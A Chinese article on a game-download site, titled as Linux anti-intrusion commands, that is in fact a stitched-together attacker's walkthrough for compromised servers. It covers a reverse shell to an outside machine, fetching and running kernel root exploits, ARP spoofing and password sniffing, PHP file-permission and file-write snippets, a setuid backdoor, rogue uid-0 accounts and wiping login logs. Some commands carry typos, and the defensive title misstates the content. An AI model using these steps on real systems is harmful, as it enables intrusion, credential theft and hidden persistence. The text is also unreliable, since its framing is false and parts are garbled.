VOGU手游网:值得大家信赖的游戏下载站!
发布时间:2021-05-16 15:24:59来源:VOGU手游网作者:VOGU手游网
本篇文章给大家分享的是有关Linux中有哪些防入侵命令,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
Linux是一种免费使用和自由传播的类UNIX操作系统,是一个基于POSIX的多用户、多任务、支持多线程和多CPU的操作系统,使用Linux能运行主要的Unix工具软件、应用程序和网络协议。
1、linux的想着先跨站
shell浏览目标站不行,命令行下输入:
ls -la /www.users/
2、溢出提权
# python –c ‘impotr pty;pty.spawn(“/bin/sh”);
来得到交互的Shell,一般的系统都默认安装python
输入id
bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
这里uid=529(zeicom)还不是root权限,
输入uname –r
返回:2.6.18-164.11.1.el5PAE
Linux提权大致可分为,第三方软件漏洞、本地信任特性、内核溢出
找对应的exp, 这里地址整理很齐全可以这里下
http://tools.90sec.org/
http://sebug.net/paper/linux_exp/
http://x73.cc/bitch/exp/
http://www.exploit-db.com/search/
命令输入pwd,这个命令是显示当前目录,
先看能不能编译 gcc -help
当前目录就是shell的目录,我在shell上传2.c
反弹shell 到外网自己机器的12345端口
上外网服务器 本地监听 nc -lvvp 12345
一般都能得到一个apache交互的shell 有时候又不行
这时候
# python -c 'impotr pty;pty.spawn("/bin/sh");' cd /tmp 进入tmp目录 mkdir Papers 创建一个Papers的目录 Papers不显眼 cd Papers 进入 Papers目录 pwd 查看当前目录 然后命令输入 wget 下载exp gcc –o 2 2.c //把2.c编译成可执行文件 g++ keio.cc -o keio chmod +x 2 //给2有执行权限 ./2 //执行2, 溢出 gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
确定arpsniffer.c需要先装pcap和 libnet。
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0 tar zxvf libpcap-0.8.1.tar.gz cd libpcap-0.8.1 ./configure make make install
重新编译arpsniffer.c
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
这次没报错,编译成功。
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
下面开始欺骗,由于是服务器端,因此我们欺骗网关:(网络环境如下,邮件服务器ip:192.168.0.11 网关:192.168.0.1 本机:192.168.0.77)
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
在另一个登录里面用tcpdump监听下
tcpdump -i eth0 host 192.168.0.11
发现有数据,把监听的数据存在文件里面:
tcpdump -i eth0 host 172.16.0.12 -w pop.txt
10分钟后停止,在SecureCRT下用sz命令下载pop.txt到本地,然后用Ethereal分析。
下面我们就可以用linsniffer监听我们想要的用户名和密码了。
先修改linsniffer.c:根据自己的需求监听相应的应用密码。我的如下:
if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==80) p=1; /* http */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ [root@bbs111 root]# gcc -o linsniffer linsniffer.c In file included from /usr/include/linux/tcp.h:21, from linsniffer.c:32: /usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!
不用管警告,直接运行编译后的linsniffer即可。
[root@bbs111 root]# ./linsniffer
用户名和密码都自动存到了tcp.log下。
3、利用跨站代码
linux不提权跨目录访问的代码
linux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。
在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。
代码如下:
$path = stripslashes($_GET['path']); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permission editable file or directory. Permission to write; ?>
把上面代码保存为tmdsb.PHP
然后访问http://www.tmdsb.com/tmdsb.php?path=../../要跨的目录/index.php
这里的index.PHP是要修改权限的文件。
收集的另一个exp:
把下面的代码保存为exp.PHP
代码:
@$filename = stripslashes($_POST['filename']); @$mess = stripslashes($_POST['mess']); $fp = @fopen({$_POST['filename']}, 'a'); @fputs($fp,$mess ); @fclose($fp); ?>
4.2.618最终Linux Kernel < 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)这个0day溢出成功
udev提权
换了个udev提权,适用于内核范围为2.6.*。
还是上传文件至服务器shell所在目录,执行命令ls,发现文件已经躺在那里面了,之后赋予exp执行权限。
chmod +x pwnkernel.c chmod +x wunderbar_emporium.sh chmod +x exploit.c
之后执行溢出./w*
成功溢出,root权限。
之后就是留下一个后门~ 添加一个root权限用户俺也不介意。。。(useradd -u 0 -o "username")
依次输入命令
cd /tmp sh-3.1# ls /lib/ld-linux* /lib/ld-linux.so.2 sh-3.1# cp /lib/ld-linux.so.2 /tmp/.str1ven sh-3.1# ls -l .str1ven -rwxr-xr-x 1 root root 121684 07-08 21:13 .str1ven sh-3.1# chmod +s .str1ven sh-3.1# ls -l .str1ven -rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven
成功建立一个后门,退出root,执行./.str1ven `which whoami`,又成功获取root权限~~
cat /etc/passwd 查看linux用户
cat /etc/shadow 查看用户密码需要root权限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息
ifconfig 查看本机ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反弹的shell中使用可以直观显示命令
bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以
Root登陆时,你的prompt会变成bash#。
系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。
echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running service --status-all | grep http
查看运行服务
lsb_release -a 查看系统版本
重启ssh服务 :
/usr/sbin/sshd stop/ usr/sbin/sshd start ssd_config文件里 PasswordAuthentication no,
将其改为
PasswordAuthentication yes
远程ssh才可登录
否则显示Access denied
其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod 777 /etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp /bin/bash /sbin/nologin
然后su的时候su - bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码的一种很菜鸟的做法。
还可以这样
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd gcc prtcl2.c –o local –static –Wall echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last记录 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的
/etc/init.d/ssh start 开22端口
/etc/ssh/sshd_config SSH服务配置文件
以上就是Linux中有哪些防入侵命令,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。
下一篇:如何在linux中删除环境变量
神雕侠侣2手游氪金玩家消费指南
食物语手游腊味合蒸高阶阵容打法思路一览
商道高手最佳上阵25人怎么搭配阵容
王牌战士据点占领怎么玩 游戏模式介绍
闪耀暖暖养不起表情包 闪耀暖暖表情包大全持续更新
王牌战士团战如何切入详细讲解
王牌战争文明重启手工炸弹怎么获得
王牌战争文明重启各种资源刷新地点与详细位置大全
和平精英超高音质怎么修改 超简单修改音质办法介绍
王者荣耀
角色扮演
斗罗大陆手游
角色扮演
一刀传世
角色扮演
梦三国
角色扮演
坠落星界
其它游戏
邪恶疯人院
休闲益智
征途永恒
角色扮演
和平精英
枪战射击
神雕侠侣2
角色扮演